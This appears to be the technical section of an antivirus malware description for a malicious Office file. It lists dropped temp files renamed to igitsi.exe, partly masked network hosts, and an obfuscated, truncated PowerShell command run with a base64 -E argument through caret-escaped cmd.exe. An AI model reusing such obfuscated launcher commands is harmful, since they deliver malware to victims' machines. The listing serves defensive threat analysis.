Technical information
- '<SYSTEM32>\cmd.exe' /C Po^w^ERS^hE^ll -E WwBTAFkAUwBUAEUATQAuAFQARQB4AHQALgBlAG4AQwBPAEQAaQBOAEcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAGcARQB0AHMAVAByAGkATgBnACgAWwBzAFkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoAZgByAG8AbQBi...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{577c7ba6-45e5-4316-b7ad-9635d4b7ff2a}.tmp
- %TEMP%\bit499e.tmp
- %TEMP%\bit493f.tmp
- %TEMP%\bit49be.tmp
- %TEMP%\bit49de.tmp
- %TEMP%\bit499e.tmp
- %TEMP%\bit493f.tmp
- %TEMP%\bit49be.tmp
- %TEMP%\bit49de.tmp
- %TEMP%\bit49be.tmp to %TEMP%\igitsi.exe
- %TEMP%\bit49de.tmp to %TEMP%\igitsi.exe
- %TEMP%\bit493f.tmp to %TEMP%\igitsi.exe
- %TEMP%\bit499e.tmp to %TEMP%\igitsi.exe
- %TEMP%\igitsi.exe
- 'cd#.##scordapp.com':443
- 'ch####p.dyndns.org':80
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- DNS ASK ch####p.dyndns.org
- '%TEMP%\igitsi.exe'
- '<SYSTEM32>\cmd.exe' /C Po^w^ERS^hE^ll -E WwBTAFkAUwBUAEUATQAuAFQARQB4AHQALgBlAG4AQwBPAEQAaQBOAEcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAGcARQB0AHMAVAByAGkATgBnACgAWwBzAFkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoAZgByAG8AbQBi...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E WwBTAFkAUwBUAEUATQAuAFQARQB4AHQALgBlAG4AQwBPAEQAaQBOAEcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAGcARQB0AHMAVAByAGkATgBnACgAWwBzAFkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABzAH...
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding